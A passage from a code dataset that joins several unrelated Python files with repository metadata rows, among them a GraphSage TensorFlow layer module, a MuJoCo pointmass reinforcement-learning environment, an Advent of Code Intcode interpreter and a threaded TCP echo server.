            input_port = CreateInputPort(io_process_group, component_location(), 'input_port').create()
            connect_to(process_group, io_process_group, processor_to_connect, input_port)
        if processor_from_connect is not None and connect_from is not None:
            output_port = CreateOutputPort(io_process_group, component_location(), 'output_port').create()
            connect_from(io_process_group, process_group, processor_from_connect, output_port, component_location)
        return io_process_group
"felipelobas@gmail.com"
] | felipelobas@gmail.com |
7f3756c05f98afee44bfcc701b9a25e895ada073 | 2c4c3f777d94157d5a5cf8664907de1a605a1110 | /algorithms/GraphSage/layers.py | ca2496d997093716a74acd63b14ed0433a38c949 | [
"Apache-2.0"
] | permissive | safe-graph/DGFraud | a86715662d86291c22dae389aa36d72b74042ab6 | 22b72d75f81dd057762f0c7225a4558a25095b8f | refs/heads/master | 2023-08-23T01:01:04.195966 | 2022-04-20T21:39:08 | 2022-04-20T21:39:08 | 223,415,751 | 632 | 162 | Apache-2.0 | 2020-07-31T04:10:54 | 2019-11-22T14:02:36 | Python | UTF-8 | Python | false | false | 3,779 | py | from __future__ import division
from __future__ import print_function
import tensorflow as tf
from graphsage.inits import zeros
flags = tf.app.flags
FLAGS = flags.FLAGS
# DISCLAIMER:
# Boilerplate parts of this code file were originally forked from
# https://github.com/tkipf/gcn
# which itself was very inspired by the keras package
# global unique layer ID dictionary for layer name assignment
_LAYER_UIDS = {}


def get_layer_uid(layer_name=''):
    """Return the next unique, 1-based ID for *layer_name*."""
    next_id = _LAYER_UIDS.get(layer_name, 0) + 1
    _LAYER_UIDS[layer_name] = next_id
    return next_id
class Layer(object):
    """Base layer class. Defines basic API for all layer objects.
    Implementation inspired by keras (http://keras.io).

    # Properties
        name: String, defines the variable scope of the layer.
        logging: Boolean, switches Tensorflow histogram logging on/off

    # Methods
        _call(inputs): Defines computation graph of layer
            (i.e. takes input, returns output)
        __call__(inputs): Wrapper for _call()
        _log_vars(): Log all variables
    """

    def __init__(self, **kwargs):
        allowed_kwargs = {'name', 'logging', 'model_size'}
        for kwarg in kwargs.keys():
            assert kwarg in allowed_kwargs, 'Invalid keyword argument: ' + kwarg
        name = kwargs.get('name')
        if not name:
            # No explicit name given: derive one like 'dense_2' from the
            # lowercase class name plus a per-class running counter.
            layer = self.__class__.__name__.lower()
            name = layer + '_' + str(get_layer_uid(layer))
        self.name = name
        self.vars = {}  # variable name -> TF variable owned by this layer
        logging = kwargs.get('logging', False)
        self.logging = logging  # when True, __call__/_log_vars emit histogram summaries
        self.sparse_inputs = False

    def _call(self, inputs):
        # Identity by default; subclasses override with the real computation.
        return inputs

    def __call__(self, inputs):
        # Wrap _call() in a name scope and optionally record input/output
        # histograms (input logging is skipped for sparse inputs).
        with tf.name_scope(self.name):
            if self.logging and not self.sparse_inputs:
                tf.summary.histogram(self.name + '/inputs', inputs)
            outputs = self._call(inputs)
            if self.logging:
                tf.summary.histogram(self.name + '/outputs', outputs)
            return outputs

    def _log_vars(self):
        # Record a histogram summary for every variable this layer owns.
        for var in self.vars:
            tf.summary.histogram(self.name + '/vars/' + var, self.vars[var])
class Dense(Layer):
    """Dense layer: output = act(dropout(x) @ W [+ b]).

    Weights are Xavier-initialized and L2-regularized with
    FLAGS.weight_decay; `dropout` is the drop probability (keep
    probability is 1 - dropout).
    """

    def __init__(self, input_dim, output_dim, dropout=0.,
                 act=tf.nn.relu, placeholders=None, bias=True, featureless=False,
                 sparse_inputs=False, **kwargs):
        super(Dense, self).__init__(**kwargs)
        self.dropout = dropout
        self.act = act  # element-wise activation applied to the affine output
        self.featureless = featureless
        self.bias = bias
        self.input_dim = input_dim
        self.output_dim = output_dim

        # helper variable for sparse dropout
        self.sparse_inputs = sparse_inputs
        if sparse_inputs:
            self.num_features_nonzero = placeholders['num_features_nonzero']

        with tf.variable_scope(self.name + '_vars'):
            self.vars['weights'] = tf.get_variable('weights', shape=(input_dim, output_dim),
                                         dtype=tf.float32,
                                         initializer=tf.contrib.layers.xavier_initializer(),
                                         regularizer=tf.contrib.layers.l2_regularizer(FLAGS.weight_decay))
            if self.bias:
                self.vars['bias'] = zeros([output_dim], name='bias')

        if self.logging:
            self._log_vars()

    def _call(self, inputs):
        x = inputs

        # NOTE(review): plain dense dropout is applied even when
        # sparse_inputs is set — confirm callers only pass dense tensors here.
        x = tf.nn.dropout(x, 1-self.dropout)

        # transform
        output = tf.matmul(x, self.vars['weights'])

        # bias
        if self.bias:
            output += self.vars['bias']

        return self.act(output)
| [
"ytongdou@gmail.com"
] | ytongdou@gmail.com |
ee9bcfc4389fcb2fb90096118f98f545a41ba488 | bb4c4cccf8bcd620aae1a8de4361caa1d749eec5 | /setup.py | 85704e4597c1f88108fd6bd00dd7f91afb15f886 | [
"MIT"
] | permissive | qxlsz/astromath | d9bac05067fdeaaf7e3bf768ef3bcb7fb7a2a547 | 5ad10de294c44818dde8e865d076fb6eda8f07b2 | refs/heads/master | 2023-08-22T19:06:36.944268 | 2020-06-25T15:32:57 | 2020-06-25T15:32:57 | 252,310,053 | 1 | 0 | MIT | 2023-09-14T12:31:39 | 2020-04-01T23:35:07 | Python | UTF-8 | Python | false | false | 1,515 | py | #!/usr/bin/env python
"""The setup script."""
from setuptools import setup, find_packages
with open('README.rst') as readme_file:
readme = readme_file.read()
with open('HISTORY.rst') as history_file:
history = history_file.read()
requirements = [ ]
setup_requirements = ['pytest-runner', ]
test_requirements = ['pytest>=3', ]
setup(
author="Rajasekhar Josyula",
author_email='rajasekhar.josyula@gmail.com',
python_requires='>=3.5',
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
],
description="Library for mathematical astronomy",
entry_points={
'console_scripts': [
'astromath=astromath.cli:main',
],
},
install_requires=requirements,
license="MIT license",
long_description=readme + '\n\n' + history,
include_package_data=True,
keywords='astromath',
name='astromath',
packages=find_packages(include=['astromath', 'astromath.*']),
setup_requires=setup_requirements,
test_suite='tests',
tests_require=test_requirements,
url='https://github.com/qxlsz/astromath',
version='1.0.1',
zip_safe=False,
)
| [
"rajasekhar.josyula@gmail.com"
] | rajasekhar.josyula@gmail.com |
94d03e9f0f7b8cec3c47cc368593566e2ada6fad | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/nouns/_magnesia.py | 9193757fb3463cb627d30a16deadeb1b54c32ebb | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 327 | py |
#calss header
class _MAGNESIA():
def __init__(self,):
self.name = "MAGNESIA"
self.definitions = [u'a white substance used in stomach medicines']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'nouns'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
e4c1794ad74b66d0d7327370b2bf5ff25c80650b | 7db9f6b8a1966b08e5bafb7fef8fb3844b3f1471 | /multiworld/envs/mujoco/pointmass/pointmass.py | 03b6dfc5649846e4e95ed395077cdadd24ede7ef | [] | no_license | newera-001/RIS | a4dd82563e9f5521b6367a7463a2ab94c5203047 | 9cee42bf28924d4220b143dabf3655a6da260350 | refs/heads/main | 2023-06-19T09:31:48.215405 | 2021-07-16T12:28:01 | 2021-07-16T12:28:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,616 | py | import abc
import copy
import numpy as np
from gym.spaces import Box, Dict
from multiworld.core.serializable import Serializable
from multiworld.envs.mujoco.mujoco_env import MujocoEnv
from multiworld.core.multitask_env import MultitaskEnv
from multiworld.envs.env_util import get_asset_full_path
from collections import OrderedDict
from multiworld.envs.env_util import (
get_stat_in_paths,
create_stats_ordered_dict,
)
import matplotlib
matplotlib.use('agg')
import matplotlib.pyplot as plt
class PointmassEnv(MujocoEnv, Serializable, MultitaskEnv):
def __init__(
self,
reward_type='dense',
norm_order=2,
action_scale=0.15,
frame_skip=100,
ball_low=(-4.0, -4.0),
ball_high=(4.0, 4.0),
goal_low=(-4.0, -4.0),
goal_high=(4.0, 4.0),
model_path='pointmass_u_wall_big.xml',
reset_low=None,
reset_high=None,
v_func_heatmap_bounds=(-2.0, 0.0),
*args,
**kwargs
):
self.quick_init(locals())
MultitaskEnv.__init__(self)
MujocoEnv.__init__(self,
model_path=get_asset_full_path('pointmass/' + model_path),
frame_skip=frame_skip,
**kwargs)
self.action_space = Box(np.array([-1, -1]), np.array([1, 1]), dtype=np.float32)
self.action_scale = action_scale
self.ball_radius = 0.50
self.walls = [
Wall(0, 1.0, 2.5, 0.5, self.ball_radius),
Wall(2.0, -0.5, 0.5, 2.0, self.ball_radius),
Wall(-2.0, -0.5, 0.5, 2.0, self.ball_radius),
]
self.reward_type = reward_type
self.norm_order = norm_order
self.ball_low, self.ball_high = np.array(ball_low), np.array(ball_high)
self.goal_low, self.goal_high = np.array(goal_low), np.array(goal_high)
if reset_low is None:
self.reset_low = np.array(ball_low)
else:
self.reset_low = np.array(reset_low)
if reset_high is None:
self.reset_high = np.array(ball_high)
else:
self.reset_high = np.array(reset_high)
obs_space_low = np.copy(self.ball_low)
obs_space_high = np.copy(self.ball_high)
goal_space_low = np.copy(self.goal_low)
goal_space_high = np.copy(self.goal_high)
self.obs_space = Box(obs_space_low, obs_space_high, dtype=np.float32)
self.goal_space = Box(goal_space_low, goal_space_high, dtype=np.float32)
self.observation_space = Dict([
('observation', self.obs_space),
('desired_goal', self.goal_space),
('achieved_goal', self.obs_space),
('state_observation', self.obs_space),
('state_desired_goal', self.goal_space),
('state_achieved_goal', self.obs_space),
('proprio_observation', self.obs_space),
('proprio_desired_goal', self.goal_space),
('proprio_achieved_goal', self.obs_space),
])
self.v_func_heatmap_bounds = v_func_heatmap_bounds
self._state_goal = None
self.reset()
def step(self, velocities):
velocities = np.clip(velocities, a_min=-1, a_max=1) * self.action_scale
ob = self._get_obs()
action = velocities
self.do_simulation(action, self.frame_skip)
state, goal = ob['state_observation'], ob['state_desired_goal']
distance_to_target = np.linalg.norm(state - goal)
is_success = distance_to_target < 1.0
is_success_2 = distance_to_target < 1.5
is_success_3 = distance_to_target < 1.75
ob = self._get_obs()
reward = self.compute_reward(action, ob)
info = {
'distance_to_target': distance_to_target,
'is_success': is_success,
'is_success_2': is_success_2,
'is_success_3': is_success_3,
'velocity': velocities,
'speed': np.linalg.norm(velocities),
}
done = False
return ob, reward, done, info
def _get_obs(self):
qpos = list(self.sim.data.qpos.flat)
flat_obs = np.array(qpos)
self._cur_obs = dict(
observation=flat_obs,
desired_goal=self._state_goal,
achieved_goal=flat_obs,
state_observation=flat_obs,
state_desired_goal=self._state_goal,
state_achieved_goal=flat_obs,
proprio_observation=flat_obs,
proprio_desired_goal=self._state_goal,
proprio_achieved_goal=flat_obs,
)
return self._cur_obs
def get_goal(self):
return {
'desired_goal': self._state_goal.copy(),
'state_desired_goal': self._state_goal.copy(),
}
def sample_goals(self, batch_size):
goals = np.random.uniform(
self.goal_space.low,
self.goal_space.high,
size=(batch_size, self.goal_space.low.size),
)
collisions = self._positions_inside_wall(goals[:,:2])
collision_idxs = np.where(collisions)[0]
while len(collision_idxs) > 0:
goals[collision_idxs,:2] = np.random.uniform(
self.goal_space.low[:2],
self.goal_space.high[:2],
size=(len(collision_idxs), 2)
)
collisions = self._positions_inside_wall(goals[:, :2])
collision_idxs = np.where(collisions)[0]
return {
'desired_goal': goals,
'state_desired_goal': goals,
}
def _positions_inside_wall(self, positions):
inside_wall = False
for wall in self.walls:
inside_wall = inside_wall | wall.contains_points(positions)
return inside_wall
def _position_inside_wall(self, pos):
for wall in self.walls:
if wall.contains_point(pos):
return True
return False
    def compute_rewards(self, actions, obs, prev_obs=None):
        """Batched reward: negative distance from achieved to desired goal.

        `actions` and `prev_obs` are accepted for interface compatibility
        but unused.  'vectorized_dense' yields a per-coordinate reward
        array; 'dense' yields one scalar per sample.
        """
        achieved_goals = obs['state_achieved_goal']
        desired_goals = obs['state_desired_goal']
        diff = achieved_goals - desired_goals
        if self.reward_type == 'vectorized_dense':
            # Per-coordinate negative absolute error.
            r = -np.abs(diff)
        elif self.reward_type == 'dense':
            # Negative p-norm (p = self.norm_order) over goal dimensions.
            r = -np.linalg.norm(diff, ord=self.norm_order, axis=1)
        else:
            raise NotImplementedError("Invalid/no reward type.")
        return r
def reset_model(self):
self._reset_ball()
self.set_goal(self.sample_goal())
self.sim.forward()
return self._get_obs()
def _reset_ball(self):
qvel = np.zeros(2)
pos_2d = np.random.uniform(self.reset_low, self.reset_high)
while self._position_inside_wall(pos_2d):
pos_2d = np.random.uniform(self.reset_low, self.reset_high)
qpos = pos_2d
self.set_state(qpos, qvel)
def set_goal(self, goal):
self._state_goal = goal['state_desired_goal']
def set_to_goal(self, goal):
qpos = goal['state_desired_goal']
qvel = np.zeros(2)
self.set_state(qpos, qvel)
def get_env_state(self):
joint_state = self.sim.get_state()
state = joint_state, self._state_goal
return copy.deepcopy(state)
def set_env_state(self, state):
state, goal = state
self.sim.set_state(state)
self.sim.forward()
self._state_goal = goal
def get_diagnostics(self, paths, prefix=''):
statistics = OrderedDict()
list_of_stat_names = [
'distance_to_target',
'is_success',
'is_success_2',
'is_success_3',
'velocity',
'speed',
]
for stat_name in list_of_stat_names:
stat_name = stat_name
stat = get_stat_in_paths(paths, 'env_infos', stat_name)
statistics.update(create_stats_ordered_dict(
'%s%s' % (prefix, stat_name),
stat,
always_show_all_stats=True,
))
statistics.update(create_stats_ordered_dict(
'Final %s%s' % (prefix, stat_name),
[s[-1] for s in stat],
always_show_all_stats=True,
))
return statistics
def viewer_setup(self):
# self.viewer.cam.trackbodyid = 0
# self.viewer.cam.lookat[0] = 0.0
# self.viewer.cam.lookat[1] = 0.0
# self.viewer.cam.lookat[2] = 0.5
# self.viewer.cam.distance = 12.5
# self.viewer.cam.elevation = -90
# self.viewer.cam.azimuth = 270
self.viewer.cam.trackbodyid = 0
self.viewer.cam.lookat[0] = 0.0
self.viewer.cam.lookat[1] = 0.75
self.viewer.cam.lookat[2] = 0.5
self.viewer.cam.distance = 11.5
self.viewer.cam.elevation = -65
self.viewer.cam.azimuth = 270
def get_states_sweep(self, nx, ny):
x = np.linspace(-4, 4, nx)
y = np.linspace(-4, 4, ny)
xv, yv = np.meshgrid(x, y)
states = np.stack((xv, yv), axis=2).reshape((-1, 2))
return states
def get_image_v(self, agent, qf, vf, obs, tau=None):
nx, ny = (50, 50)
x = np.linspace(-4, 4, nx)
y = np.linspace(-4, 4, ny)
xv, yv = np.meshgrid(x, y)
sweep_obs = np.tile(obs.reshape((1, -1)), (nx * ny, 1))
sweep_goal = np.stack((xv, yv), axis=2).reshape((-1, 2))
if tau is not None:
sweep_tau = np.tile(tau, (nx * ny, 1))
if vf is not None:
if tau is not None:
v_vals = vf.eval_np(sweep_obs, sweep_goal, sweep_tau)
else:
sweep_obs_goal = np.hstack((sweep_obs, sweep_goal))
v_vals = vf.eval_np(sweep_obs_goal)
else:
if tau is not None:
sweep_actions = agent.eval_np(sweep_obs, sweep_goal, sweep_tau)
v_vals = qf.eval_np(sweep_obs, sweep_actions, sweep_goal, sweep_tau)
else:
sweep_obs_goal = np.hstack((sweep_obs, sweep_goal))
sweep_actions = agent.eval_np(sweep_obs_goal)
v_vals = qf.eval_np(sweep_obs_goal, sweep_actions)
if tau is not None:
v_vals = -np.linalg.norm(v_vals, ord=qf.norm_order, axis=1)
v_vals = v_vals.reshape((nx, ny))
if self.v_func_heatmap_bounds is not None:
vmin = self.v_func_heatmap_bounds[0]
vmax = self.v_func_heatmap_bounds[1]
else:
vmin, vmax = None, None
return self.get_image_plt(
v_vals,
vmin=vmin, vmax=vmax,
draw_state=True, draw_goal=True,
)
def get_image_plt(
self,
vals,
vmin=None, vmax=None,
extent=[-4, 4, -4, 4],
small_markers=False,
draw_walls=True, draw_state=True, draw_goal=False, draw_subgoals=False,
imsize=84
):
fig, ax = plt.subplots()
ax.set_ylim(extent[2:4])
# ax.set_xlim(extent[0:2])
ax.set_xlim([4, -4])
ax.set_ylim(ax.get_ylim()[::-1])
DPI = fig.get_dpi()
fig.set_size_inches(imsize / float(DPI), imsize / float(DPI))
marker_factor = 0.60
if small_markers:
marker_factor = 0.10
ob = self._get_obs()
if draw_state:
if small_markers:
color = 'cyan'
else:
color = 'blue'
ball = plt.Circle(ob['state_observation'], self.ball_radius * marker_factor, color=color)
ax.add_artist(ball)
if draw_goal:
goal = plt.Circle(ob['state_desired_goal'], self.ball_radius * marker_factor, color='green')
ax.add_artist(goal)
if draw_subgoals:
if self.subgoals is not None:
subgoal = plt.Circle(self.subgoals[0], (self.ball_radius + 0.1) * marker_factor, color='red')
else:
subgoal = None
ax.add_artist(subgoal)
if draw_walls:
for wall in self.walls:
# ax.vlines(x=wall.min_x, ymin=wall.min_y, ymax=wall.max_y)
# ax.hlines(y=wall.min_y, xmin=wall.min_x, xmax=wall.max_x)
# ax.vlines(x=wall.max_x, ymin=wall.min_y, ymax=wall.max_y)
# ax.hlines(y=wall.max_y, xmin=wall.min_x, xmax=wall.max_x)
ax.vlines(x=wall.endpoint1[0], ymin=wall.endpoint2[1], ymax=wall.endpoint1[1])
ax.hlines(y=wall.endpoint2[1], xmin=wall.endpoint3[0], xmax=wall.endpoint2[0])
ax.vlines(x=wall.endpoint3[0], ymin=wall.endpoint3[1], ymax=wall.endpoint4[1])
ax.hlines(y=wall.endpoint4[1], xmin=wall.endpoint4[0], xmax=wall.endpoint1[0])
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
fig.subplots_adjust(bottom=0)
fig.subplots_adjust(top=1)
fig.subplots_adjust(right=1)
fig.subplots_adjust(left=0)
ax.axis('off')
ax.imshow(
vals,
extent=extent,
cmap=plt.get_cmap('plasma'),
interpolation='nearest',
vmax=vmax,
vmin=vmin,
origin='bottom', # <-- Important! By default top left is (0, 0)
)
return self.plt_to_numpy(fig)
def plt_to_numpy(self, fig):
fig.canvas.draw()
data = np.fromstring(fig.canvas.tostring_rgb(), dtype=np.uint8, sep='')
data = data.reshape(fig.canvas.get_width_height()[::-1] + (3,))
plt.close()
return data
class Wall(object, metaclass=abc.ABCMeta):
    """Axis-aligned rectangular obstacle, padded by `min_dist` for collision tests.

    The `endpoint*` corners describe the un-padded rectangle (used for drawing);
    the min/max bounds include the padding and drive the containment tests.
    """

    def __init__(self, x_center, y_center, x_thickness, y_thickness, min_dist):
        pad_x = x_thickness + min_dist
        pad_y = y_thickness + min_dist
        self.min_x = x_center - pad_x
        self.max_x = x_center + pad_x
        self.min_y = y_center - pad_y
        self.max_y = y_center + pad_y
        # Corners of the wall itself (no padding).
        self.endpoint1 = (x_center + x_thickness, y_center + y_thickness)
        self.endpoint2 = (x_center + x_thickness, y_center - y_thickness)
        self.endpoint3 = (x_center - x_thickness, y_center - y_thickness)
        self.endpoint4 = (x_center - x_thickness, y_center + y_thickness)

    def contains_point(self, point):
        """True if a single (x, y) point lies strictly inside the padded bounds."""
        inside_x = self.min_x < point[0] < self.max_x
        inside_y = self.min_y < point[1] < self.max_y
        return inside_x and inside_y

    def contains_points(self, points):
        """Elementwise containment test for an (N, 2) array of points."""
        in_x = (self.min_x < points[:, 0]) * (points[:, 0] < self.max_x)
        in_y = (self.min_y < points[:, 1]) * (points[:, 1] < self.max_y)
        return in_x * in_y
"elliot.chane-sane@polytechnique.edu"
] | elliot.chane-sane@polytechnique.edu |
12d5b08f43173bbade7172ef7a8a5e8bb3df40d1 | 765929f8e17a39e680592fe461e36b4a296878f2 | /sklearn_tests/ml4.py | 009e190c710fa9a3525789f29548d01b0c4b99bb | [] | no_license | TontonTremblay/Machine_Learning | ec2b4f0429601cb17e7db0579350eee0809608bd | 9e273c9cc373a0919d10ba2a610ec76675ef2a47 | refs/heads/master | 2016-08-12T11:01:08.664217 | 2015-11-14T00:22:34 | 2015-11-14T00:22:34 | 44,108,762 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 420 | py | import numpy as np
from sklearn import cross_validation, datasets, linear_model
from sklearn.grid_search import GridSearchCV
diabetes = datasets.load_diabetes()
X = diabetes.data[:150]
y = diabetes.target[:150]
lasso = linear_model.Lasso()
alphas = np.logspace(-4, -.5, 30)
clf = GridSearchCV(estimator = lasso,param_grid=dict(alpha=alphas),n_jobs=1)
clf.fit(X,y)
print clf.best_score_
print clf.best_estimator_.alpha | [
"tonton.tremblay@gmail.com"
] | tonton.tremblay@gmail.com |
96f571b5a83d21e3d3709c4e9197979323ce8dff | 9aaf600dfe71b217e6e218c8033dd79821a8d9c0 | /ch0/15requests and API/2pokeapi.py | b1cab7b3af6dcc9deb5610ea80844bad66c48d91 | [] | no_license | bonfiglio/introPython | 153d4467fbccab33a47a9c1157120ccb035efb9a | a2dae50d4f6efcc02217f8b4597f221164aa9ae5 | refs/heads/master | 2020-03-23T00:21:32.790040 | 2018-10-07T09:32:57 | 2018-10-07T09:32:57 | 139,994,418 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 451 | py | import requests
import json
# https://tutorialedge.net/python/python-http-requests-tutorial/
def main():
    """Fetch the Pokemon with id 1 from the public PokeAPI and print it.

    Performs network I/O only; nothing is returned.
    """
    req = requests.get('http://pokeapi.co/api/v2/pokemon/1/')
    print("HTTP Status Code: " + str(req.status_code))
    print(req.headers)
    # NOTE(review): assumes the request succeeded; a non-200 body may not
    # be valid JSON, in which case json.loads raises — confirm desired behavior.
    json_response = json.loads(req.content)
    print(json_response)
    print("Pokemon Name: " + json_response['name'])
    print(f"{json_response['abilities']}")
if __name__ == '__main__':
main()
| [
"bonfiglio.fabrizio@gmail.com"
] | bonfiglio.fabrizio@gmail.com |
97a06c5441ff70691bbb29a70ec1cc78d5d5b2d8 | 7eb6071c56bde2e628e131237182ec2f6c620156 | /day7/intcode.py | 9751bc41e49e92c0c30bec596efd6b5b55d6a5a7 | [] | no_license | sambres/Aoc2019 | 98f42d9c7828b3a2fc23abeb9e858310c344c587 | f8543cb351a27ad4d9e43125ea8d0bcb6c64c7a3 | refs/heads/master | 2021-10-25T05:27:58.309414 | 2021-10-11T11:19:38 | 2021-10-11T11:19:38 | 231,900,398 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,295 | py |
def intCode(program, input):
    """Run an Intcode program (Advent of Code 2019) to completion.

    program -- list of opcode/value strings; mutated in place.
    input   -- list of values consumed by opcode 3; mutated in place.
                (The name shadows the builtin `input`; kept for callers.)
    Returns the last value emitted by opcode 4 (as a string), or None if
    the program produced no output before halting (opcode 99).
    """
    result = None
    i = 0
    while True:
        op = int(program[i][-2:])
        if op == 99:
            return result
        # Parameter count per opcode.
        if op == 1 or op == 2 or op == 7 or op == 8:
            parametersLength = 3
        if op == 3 or op == 4:
            parametersLength = 1
        if op == 5 or op == 6:
            parametersLength = 2
        # Resolve each parameter to an index into `program`:
        # mode '0' = position (cell holds an address),
        # mode '1' = immediate (the parameter's own cell is the operand).
        modes = program[i][:-2].zfill(parametersLength)
        parameters = []
        for index, mode in enumerate(modes[::-1]):
            parameter = int(program[i + index + 1])
            if mode == '0':
                parameters.append(parameter)
            else:
                parameters.append(i + index + 1)
        if op == 1:  # add
            program[parameters[2]] = str(
                int(program[parameters[0]]) + int(program[parameters[1]]))
        if op == 2:  # multiply
            program[parameters[2]] = str(
                int(program[parameters[0]]) * int(program[parameters[1]]))
        if op == 3:  # read one input value
            program[parameters[0]] = str(input.pop(0))
        if op == 4:  # emit output (remember the latest)
            result = program[parameters[0]]
        if op == 5 and int(program[parameters[0]]) != 0:  # jump-if-true
            i = int(program[parameters[1]])
            continue
        if op == 6 and int(program[parameters[0]]) == 0:  # jump-if-false
            i = int(program[parameters[1]])
            continue
        if op == 7:  # less-than
            # BUGFIX: compare numerically; the original compared the raw
            # strings, so e.g. '10' < '9' was (wrongly) true.
            if int(program[parameters[0]]) < int(program[parameters[1]]):
                program[parameters[2]] = '1'
            else:
                program[parameters[2]] = '0'
        if op == 8:  # equals
            # BUGFIX: numeric comparison for the same reason as opcode 7.
            if int(program[parameters[0]]) == int(program[parameters[1]]):
                program[parameters[2]] = '1'
            else:
                program[parameters[2]] = '0'
        i += parametersLength + 1
def intCodeAdvance(program, input, step=0):
    """Resumable Intcode interpreter.

    Starts executing `program` at instruction pointer `step`.
    Returns:
      (outputs, True)       -- program halted (opcode 99)
      (outputs, False, ip)  -- program is blocked waiting for input;
                               resume later with step=ip and more input.
    `outputs` collects every opcode-4 emission (strings); `program` and
    `input` are mutated in place.
    """
    result = []
    i = step
    while True:
        op = int(program[i][-2:])
        if op == 99:
            return (result, True)
        # Parameter count per opcode.
        if op == 1 or op == 2 or op == 7 or op == 8:
            parametersLength = 3
        if op == 3 or op == 4:
            parametersLength = 1
        if op == 5 or op == 6:
            parametersLength = 2
        # Resolve parameters: mode '0' = position, mode '1' = immediate.
        modes = program[i][:-2].zfill(parametersLength)
        parameters = []
        for index, mode in enumerate(modes[::-1]):
            parameter = int(program[i + index + 1])
            if mode == '0':
                parameters.append(parameter)
            else:
                parameters.append(i + index + 1)
        if op == 1:  # add
            program[parameters[2]] = str(
                int(program[parameters[0]]) + int(program[parameters[1]]))
        if op == 2:  # multiply
            program[parameters[2]] = str(
                int(program[parameters[0]]) * int(program[parameters[1]]))
        if op == 3:  # read one input value
            if len(input) == 0:
                # Starved for input: suspend so the caller can feed more.
                return (result, False, i)
            program[parameters[0]] = str(input.pop(0))
        if op == 4:  # emit output
            result.append(program[parameters[0]])
        if op == 5 and int(program[parameters[0]]) != 0:  # jump-if-true
            i = int(program[parameters[1]])
            continue
        if op == 6 and int(program[parameters[0]]) == 0:  # jump-if-false
            i = int(program[parameters[1]])
            continue
        if op == 7:  # less-than
            # BUGFIX: compare numerically; the original compared the raw
            # strings, so e.g. '10' < '9' was (wrongly) true.
            if int(program[parameters[0]]) < int(program[parameters[1]]):
                program[parameters[2]] = '1'
            else:
                program[parameters[2]] = '0'
        if op == 8:  # equals
            # BUGFIX: numeric comparison for the same reason as opcode 7.
            if int(program[parameters[0]]) == int(program[parameters[1]]):
                program[parameters[2]] = '1'
            else:
                program[parameters[2]] = '0'
        i += parametersLength + 1
| [
"a.sambres@gmail.com"
] | a.sambres@gmail.com |
d317b649da9dc9553e5fa5daa23ef2d3ef162554 | 218eb56cf26d5f22d1fc9e7a1dd9a138ee5cd75b | /python_stuff/tcp_thread_server.py | 3375349f729ebf739965ea5f6a575a6eb04f4a1c | [] | no_license | breadpitt/SystemsProgramming | 6be7cf23e1e0a6b27d6c5b824c9e0fe60799d0f2 | 3fd71725842b52f0c45372e5922d0a98e8297ec1 | refs/heads/master | 2020-03-28T00:07:53.858131 | 2018-08-17T02:43:59 | 2018-08-17T02:43:59 | 147,377,658 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,998 | py | #!/opt/local/bin/python3.7
import sys
from socket import socket, SOCK_STREAM, AF_INET
from select import select
import traceback
from threading import Thread
class TCPClient(Thread):
    """Per-connection worker thread: echoes everything received back to the peer."""
    def __init__(self, client_sock, client_address):
        # Call parent (thread) constructor
        super(TCPClient, self).__init__()
        self.client_sock = client_sock
        self.client_address = client_address
        # Polled by run(); cleared by stop() or on any socket error.
        self.keep_running = True
        self.read_fds = [self.client_sock]
    def run(self):
        """Echo loop: block in select() until readable, then send bytes back."""
        while self.keep_running == True:
            try:
                readlist, _, _ = select(self.read_fds, [], [])
                if self.client_sock in readlist:
                    data = self.client_sock.recv(4096)
                    self.client_sock.send(data)
                    # A zero-byte read means the peer closed the connection.
                    if len(data) == 0:
                        self.client_sock.close()
                        # NOTE(review): the loop keeps selecting on the now
                        # closed socket; the next select/recv raises and the
                        # except branch below finishes shutting the thread down.
            except Exception:
                self.keep_running = False
                print("Shutting down client socket.")
                self.client_sock.close()
    def stop(self):
        # Ask the run() loop to exit after its current select() returns.
        self.keep_running = False
def print_error(e, f="UNKNOWN"):
    """Print an exception, its type, and a traceback, labeled with the failing call `f`."""
    header = "Error in %s!" % (f)
    for item in (header, e, type(e)):
        print(item)
    traceback.print_exc()
def main():
if len(sys.argv) == 3:
ip = sys.argv[1]
try:
port = int(sys.argv[2])
except:
print("Port %s unable to be converted to number, run with HOST PORT" % (sys.argv[2]))
sys.exit(1)
else:
print("Run with %s HOST PORT" % (sys.argv[0]))
sys.exit(1)
try:
server_sock = socket(AF_INET, SOCK_STREAM)
except Exception as e:
print_error(e, "socket")
sys.exit(1)
try:
server_sock.bind((ip, port))
except Exception as e:
print_error(e, "bind")
sys.exit(1)
try:
server_sock.listen(100)
except Exception as e:
print_error(e, "listen")
sys.exit(1)
read_sockets = []
write_sockets = []
except_sockets = []
client_threads = []
read_sockets.append(server_sock)
except_sockets.append(server_sock)
quit = False
readlist, writelist, exceptlist = [], [], []
while (quit == False):
try:
readlist, writelist, exceptlist = select(read_sockets, write_sockets, except_sockets, 3)
except KeyboardInterrupt as k:
quit = True
except Exception as e:
print_error(e, "select")
if server_sock in readlist:
try:
client_sock, (client_ip, client_port) = server_sock.accept()
temp_client_thread = TCPClient(client_sock, (client_ip, client_port))
client_threads.append(temp_client_thread)
temp_client_thread.start()
except KeyboardInterrupt as k:
quit = True
except Exception as e:
print_error(e, "accept")
for client_thread in client_threads:
if client_thread.keep_running == False:
print("Removing client thread.")
client_thread.join()
client_threads.remove(client_thread)
break;
try:
print("Closing sockets.")
server_sock.close()
